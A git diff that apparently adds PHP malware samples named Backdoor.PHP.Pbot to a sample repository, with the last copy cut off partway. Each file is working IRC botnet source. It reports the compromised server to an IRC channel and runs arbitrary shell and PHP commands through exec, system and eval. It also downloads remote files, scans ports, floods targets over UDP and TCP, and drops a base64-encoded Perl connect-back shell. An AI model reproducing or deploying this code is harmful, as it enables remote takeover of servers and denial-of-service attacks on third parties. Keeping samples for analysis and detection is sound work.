for($i=0;$i2) + { + switch($cmd[1]) + { + case "QUIT": + if($this->is_logged_in($host)) + { + $this->log_out($host); + } + break; + case "PART": + if($this->is_logged_in($host)) + { + $this->log_out($host); + } + break; + case "PRIVMSG": + if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) + { + if(substr($mcmd[0],0,1)==".") + { + switch(substr($mcmd[0],1)) + { + case "user": + if($mcmd[1]==$this->config['password']) + { + $this->log_in($host); + } + else + { + $this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!"); + } + break; + } + } + } + elseif($this->is_logged_in($host)) + { + if(substr($mcmd[0],0,1)==".") + { + switch(substr($mcmd[0],1)) + { + case "restart": + $this->send("QUIT :restart commando from $nick"); + fclose($this->conn); + $this->start(); + break; + case "mail": //mail to from subject message + if(count($mcmd)>4) + { + $header = "From: <".$mcmd[2].">"; + if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) + { + $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail."); + } + else + { + $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2"); + } + } + break; + case "safe": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") + { + $safemode = "on"; + } + else { + $safemode = "off"; + } + $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode.""); + break; + case "inbox": //teste inbox + if(isset($mcmd[1])) + { + $token = md5(uniqid(rand(), true)); + $header = "From: "; + $a = php_uname(); + $b = getenv("SERVER_SOFTWARE"); + $c = gethostbyname($_SERVER["HTTP_HOST"]); + if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl ",$header)) + { + $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send"); + } + else + { + $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2"); + } + } + break; + case "conback": + if(count($mcmd)>2) + { + $this->conback($mcmd[1],$mcmd[2]); + } + break; + case "dns": + if(isset($mcmd[1])) + { + $ip = explode(".",$mcmd[1]); + if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) + { + $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); + } + else + { + $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); + } + } + break; + case "info": + case "vunl": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)"); + $this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'].""); + break; + case "bot": + $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp."); + break; + case "uname": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)"); + break; + case "rndnick": + $this->set_nick(); + break; + case "raw": + $this->send(strstr($msg,$mcmd[1])); + break; + case "eval": + $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); + break; + case "sexec": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = shell_exec($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "exec": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = exec($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "passthru": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = passthru($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "popen": + if(isset($mcmd[1])) + { + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $this->privmsg($this->config['chan'],"[\2popen\2]: $command"); + $pipe = popen($command,"r"); + while(!feof($pipe)) + { + $pbuf = trim(fgets($pipe,512)); + if($pbuf != NULL) + $this->privmsg($this->config['chan']," : $pbuf"); + } + pclose($pipe); + } + + case "system": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = system($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + + case "pscan": // .pscan 127.0.0.1 6667 + if(count($mcmd) > 2) + { + if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) + $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); + else + $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); + } + break; + case "ud.server": // .ud.server [password] + if(count($mcmd)>2) + { + $this->config['server'] = $mcmd[1]; + $this->config['port'] = $mcmd[2]; + if(isset($mcmcd[3])) + { + $this->config['pass'] = $mcmd[3]; + $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]); + } + else + { + $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]); + } + } + break; + case "download": + if(count($mcmd) > 2) + { + if(!$fp = fopen($mcmd[2],"w")) + { + $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada."); + } + else + { + if(!$get = file($mcmd[1])) + { + $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2"); + } + else + { + for($i=0;$i<=count($get);$i++) + { + fwrite($fp,$get[$i]); + } + $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2"); + } + fclose($fp); + } + } + else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); } + break; + case "die": + $this->send("QUIT :die command from $nick"); + fclose($this->conn); + exit; + case "logout": + $this->log_out($host); + $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!"); + break; + case "udpflood": + if(count($mcmd)>3) + { + $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); + } + break; + case "tcpflood": + if(count($mcmd)>5) + { + $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); + } + break; + } + } + } + break; + } + } + } + $old_buf = $this->buf; + } + $this->start(); + } + function send($msg) + { + fwrite($this->conn,"$msg\r\n"); + + } + function join($chan,$key=NULL) + { + $this->send("JOIN $chan $key"); + } + function privmsg($to,$msg) + { + $this->send("PRIVMSG $to :$msg"); + } + function notice($to,$msg) + { + $this->send("NOTICE $to :$msg"); + } + function is_logged_in($host) + { + if(isset($this->users[$host])) + return 1; + else + return 0; + } + function log_in($host) + { + $this->users[$host] = true; + } + function log_out($host) + { + unset($this->users[$host]); + } + function set_nick() + { + if(isset($_SERVER['SERVER_SOFTWARE'])) + { + if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) + $this->nick = "[A]"; + elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) + $this->nick = "[I]"; + elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) + $this->nick = "[X]"; + else + $this->nick = "[U]"; + } + else + { + $this->nick = "[C]"; + } + $this->nick .= $this->config['prefix']; + for($i=0;$i<$this->config['maxrand'];$i++) + $this->nick .= mt_rand(0,9); + $this->send("NICK ".$this->nick); + } + function udpflood($host,$packetsize,$time) { + $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } + $timei = time(); + $i = 0; + while(time()-$timei < $time) { + $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); + fwrite($fp,$packet); + fclose($fp); + $i++; + } + $env = $i * $packetsize; + $env = $env / 1048576; + $vel = $env / $time; + $vel = round($vel); + $env = round($env); + $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s "); +} + function tcpflood($host,$packets,$packetsize,$port,$delay) + { + $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) + $packet .= chr(mt_rand(1,256)); + for($i=0;$i<$packets;$i++) + { + if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) + { + $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); + return 0; + } + else + { + fwrite($fp,$packet); + fclose($fp); + } + sleep($delay); + } + $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); + } + function conback($ip,$port) + { + $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port"); + $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw=="; + if (is_writable("/tmp")) + { + if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); } + $fp=fopen("/tmp/dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl /tmp/dc.pl $ip $port &"); + unlink("/tmp/dc.pl"); + } + else + { + if (is_writable("/var/tmp")) + { + if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); } + $fp=fopen("/var/tmp/dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl /var/tmp/dc.pl $ip $port &"); + unlink("/var/tmp/dc.pl"); + } + if (is_writable(".")) + { + if (file_exists("dc.pl")) { unlink("dc.pl"); } + $fp=fopen("dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl dc.pl $ip $port &"); + unlink("dc.pl"); + } + } + } +} + +$bot = new pBot; +$bot->start(); + +?> + diff --git a/PHP/Backdoor.PHP.Pbot.b b/PHP/Backdoor.PHP.Pbot.b new file mode 100644 index 00000000..1e75eea9 --- /dev/null +++ b/PHP/Backdoor.PHP.Pbot.b @@ -0,0 +1,516 @@ + + * + * COMMANDS: + * + * .user //login to the bot + * .logout //logout of the bot + * .die //kill the bot + * .restart //restart the bot + * .mail //send an email + * .dns //dns lookup + * .download //download a file + * .exec // uses exec() //execute a command + * .sexec // uses shell_exec() //execute a command + * .cmd // uses popen() //execute a command + * .info //get system information + * .php // uses eval() //execute php code + * .tcpflood //tcpflood attack + * .udpflood //udpflood attack + * .raw //raw IRC command + * .rndnick //change nickname + * .pscan //port scan + * .safe // test safe_mode (dvl) + * .inbox // test inbox (dvl) + * .conback // conect back (dvl) + * .uname // return shell's uname using a php function (dvl) + * + */ + +set_time_limit(0); +error_reporting(0); +echo "ok!"; + +class pBot +{ + var $config = array("server"=>"irc.dal.net", + "port"=>"7000", + "pass"=>"", + "prefix"=>"aisen", + "maxrand"=>"2", + "chan"=>"#waktu", + "chan2"=>"#majene", + "key"=>"1988", + "modes"=>"+ps", + "password"=>"1988", + "trigger"=>".", + "hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org) + ); + var $users = array(); + function start() + { + if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) + $this->start(); + $ident = $this->config['prefix']; + $alph = range("0","9"); + for($i=0;$i<$this->config['maxrand'];$i++) + $ident .= $alph[rand(0,9)]; + if(strlen($this->config['pass'])>0) + $this->send("PASS ".$this->config['pass']); + $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname().""); + $this->set_nick(); + $this->main(); + } + function main() + { + while(!feof($this->conn)) + { + $this->buf = trim(fgets($this->conn,512)); + $cmd = explode(" ",$this->buf); + if(substr($this->buf,0,6)=="PING :") + { + $this->send("PONG :".substr($this->buf,6)); + } + if(isset($cmd[1]) && $cmd[1] =="001") + { + $this->send("MODE ".$this->nick." ".$this->config['modes']); + $this->join($this->config['chan'],$this->config['key']); + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)"); + $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'].""); + } + if(isset($cmd[1]) && $cmd[1]=="433") + { + $this->set_nick(); + } + if($this->buf != $old_buf) + { + $mcmd = array(); + $msg = substr(strstr($this->buf," :"),2); + $msgcmd = explode(" ",$msg); + $nick = explode("!",$cmd[0]); + $vhost = explode("@",$nick[1]); + $vhost = $vhost[1]; + $nick = substr($nick[0],1); + $host = $cmd[0]; + if($msgcmd[0]==$this->nick) + { + for($i=0;$i2) + { + switch($cmd[1]) + { + case "QUIT": + if($this->is_logged_in($host)) + { + $this->log_out($host); + } + break; + case "PART": + if($this->is_logged_in($host)) + { + $this->log_out($host); + } + break; + case "PRIVMSG": + if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) + { + if(substr($mcmd[0],0,1)==".") + { + switch(substr($mcmd[0],1)) + { + case "user": + if($mcmd[1]==$this->config['password']) + { + $this->log_in($host); + } + else + { + $this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!"); + } + break; + } + } + } + elseif($this->is_logged_in($host)) + { + if(substr($mcmd[0],0,1)==".") + { + switch(substr($mcmd[0],1)) + { + case "restart": + $this->send("QUIT :restart commando from $nick"); + fclose($this->conn); + $this->start(); + break; + case "mail": //mail to from subject message + if(count($mcmd)>4) + { + $header = "From: <".$mcmd[2].">"; + if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) + { + $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail."); + } + else + { + $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2"); + } + } + break; + case "safe": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") + { + $safemode = "on"; + } + else { + $safemode = "off"; + } + $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode.""); + break; + case "inbox": //teste inbox + if(isset($mcmd[1])) + { + $token = md5(uniqid(rand(), true)); + $header = "From: "; + $a = php_uname(); + $b = getenv("SERVER_SOFTWARE"); + $c = gethostbyname($_SERVER["HTTP_HOST"]); + if(!mail($mcmd[1],"InBox Test","#korban. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl ",$header)) + { + $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send"); + } + else + { + $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2"); + } + } + break; + case "conback": + if(count($mcmd)>2) + { + $this->conback($mcmd[1],$mcmd[2]); + } + break; + case "dns": + if(isset($mcmd[1])) + { + $ip = explode(".",$mcmd[1]); + if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) + { + $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); + } + else + { + $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); + } + } + break; + case "info": + case "vunl": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)"); + $this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'].""); + break; + case "bot": + $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #korban."); + break; + case "uname": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)"); + break; + case "rndnick": + $this->set_nick(); + break; + case "raw": + $this->send(strstr($msg,$mcmd[1])); + break; + case "eval": + $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); + break; + case "sexec": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = shell_exec($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "exec": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = exec($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "passthru": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = passthru($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "popen": + if(isset($mcmd[1])) + { + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $this->privmsg($this->config['chan'],"[\2popen\2]: $command"); + $pipe = popen($command,"r"); + while(!feof($pipe)) + { + $pbuf = trim(fgets($pipe,512)); + if($pbuf != NULL) + $this->privmsg($this->config['chan']," : $pbuf"); + } + pclose($pipe); + } + + case "system": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = system($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + + case "pscan": // .pscan 127.0.0.1 6667 + if(count($mcmd) > 2) + { + if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) + $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); + else + $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); + } + break; + case "ud.server": // .ud.server [password] + if(count($mcmd)>2) + { + $this->config['server'] = $mcmd[1]; + $this->config['port'] = $mcmd[2]; + if(isset($mcmcd[3])) + { + $this->config['pass'] = $mcmd[3]; + $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]); + } + else + { + $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]); + } + } + break; + case "download": + if(count($mcmd) > 2) + { + if(!$fp = fopen($mcmd[2],"w")) + { + $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada."); + } + else + { + if(!$get = file($mcmd[1])) + { + $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2"); + } + else + { + for($i=0;$i<=count($get);$i++) + { + fwrite($fp,$get[$i]); + } + $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2"); + } + fclose($fp); + } + } + else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); } + break; + case "die": + $this->send("QUIT :die command from $nick"); + fclose($this->conn); + exit; + case "logout": + $this->log_out($host); + $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!"); + break; + case "udpflood": + if(count($mcmd)>3) + { + $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); + } + break; + case "tcpflood": + if(count($mcmd)>5) + { + $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); + } + break; + } + } + } + break; + } + } + } + $old_buf = $this->buf; + } + $this->start(); + } + function send($msg) + { + fwrite($this->conn,"$msg\r\n"); + + } + function join($chan,$key=NULL) + { + $this->send("JOIN $chan $key"); + } + function privmsg($to,$msg) + { + $this->send("PRIVMSG $to :$msg"); + } + function notice($to,$msg) + { + $this->send("NOTICE $to :$msg"); + } + function is_logged_in($host) + { + if(isset($this->users[$host])) + return 1; + else + return 0; + } + function log_in($host) + { + $this->users[$host] = true; + } + function log_out($host) + { + unset($this->users[$host]); + } + function set_nick() + { + if(isset($_SERVER['SERVER_SOFTWARE'])) + { + if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) + $this->nick = "[A]"; + elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) + $this->nick = "[I]"; + elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) + $this->nick = "[X]"; + else + $this->nick = "[U]"; + } + else + { + $this->nick = "[C]"; + } + $this->nick .= $this->config['prefix']; + for($i=0;$i<$this->config['maxrand'];$i++) + $this->nick .= mt_rand(0,9); + $this->send("NICK ".$this->nick); + } + function udpflood($host,$packetsize,$time) { + $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } + $timei = time(); + $i = 0; + while(time()-$timei < $time) { + $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); + fwrite($fp,$packet); + fclose($fp); + $i++; + } + $env = $i * $packetsize; + $env = $env / 1048576; + $vel = $env / $time; + $vel = round($vel); + $env = round($env); + $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s "); +} + function tcpflood($host,$packets,$packetsize,$port,$delay) + { + $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) + $packet .= chr(mt_rand(1,256)); + for($i=0;$i<$packets;$i++) + { + if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) + { + $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); + return 0; + } + else + { + fwrite($fp,$packet); + fclose($fp); + } + sleep($delay); + } + $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); + } + function conback($ip,$port) + { + $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port"); + $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw=="; + if (is_writable("/tmp")) + { + if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); } + $fp=fopen("/tmp/dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl /tmp/dc.pl $ip $port &"); + unlink("/tmp/dc.pl"); + } + else + { + if (is_writable("/var/tmp")) + { + if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); } + $fp=fopen("/var/tmp/dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl /var/tmp/dc.pl $ip $port &"); + unlink("/var/tmp/dc.pl"); + } + if (is_writable(".")) + { + if (file_exists("dc.pl")) { unlink("dc.pl"); } + $fp=fopen("dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl dc.pl $ip $port &"); + unlink("dc.pl"); + } + } + } +} + +$bot = new pBot; +$bot->start(); + +?> + + + diff --git a/PHP/Backdoor.PHP.Pbot.c b/PHP/Backdoor.PHP.Pbot.c new file mode 100644 index 00000000..ff5ece4d --- /dev/null +++ b/PHP/Backdoor.PHP.Pbot.c @@ -0,0 +1,516 @@ + + * + * COMMANDS: + * + * .user //login to the bot + * .logout //logout of the bot + * .die //kill the bot + * .restart //restart the bot + * .mail //send an email + * .dns //dns lookup + * .download //download a file + * .exec // uses exec() //execute a command + * .sexec // uses shell_exec() //execute a command + * .cmd // uses popen() //execute a command + * .info //get system information + * .php // uses eval() //execute php code + * .tcpflood //tcpflood attack + * .udpflood //udpflood attack + * .raw //raw IRC command + * .rndnick //change nickname + * .pscan //port scan + * .safe // test safe_mode (dvl) + * .inbox // test inbox (dvl) + * .conback // conect back (dvl) + * .uname // return shell's uname using a php function (dvl) + * + */ + +set_time_limit(0); +error_reporting(0); +echo "ok!"; + +class pBot +{ + var $config = array("server"=>"irc.dal.net", + "port"=>"7000", + "pass"=>"", + "prefix"=>"aisen", + "maxrand"=>"2", + "chan"=>"#aisen", + "chan2"=>"#aisen", + "key"=>"1988", + "modes"=>"+ps", + "password"=>"1988", + "trigger"=>".", + "hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org) + ); + var $users = array(); + function start() + { + if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) + $this->start(); + $ident = $this->config['prefix']; + $alph = range("0","9"); + for($i=0;$i<$this->config['maxrand'];$i++) + $ident .= $alph[rand(0,9)]; + if(strlen($this->config['pass'])>0) + $this->send("PASS ".$this->config['pass']); + $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname().""); + $this->set_nick(); + $this->main(); + } + function main() + { + while(!feof($this->conn)) + { + $this->buf = trim(fgets($this->conn,512)); + $cmd = explode(" ",$this->buf); + if(substr($this->buf,0,6)=="PING :") + { + $this->send("PONG :".substr($this->buf,6)); + } + if(isset($cmd[1]) && $cmd[1] =="001") + { + $this->send("MODE ".$this->nick." ".$this->config['modes']); + $this->join($this->config['chan'],$this->config['key']); + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)"); + $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'].""); + } + if(isset($cmd[1]) && $cmd[1]=="433") + { + $this->set_nick(); + } + if($this->buf != $old_buf) + { + $mcmd = array(); + $msg = substr(strstr($this->buf," :"),2); + $msgcmd = explode(" ",$msg); + 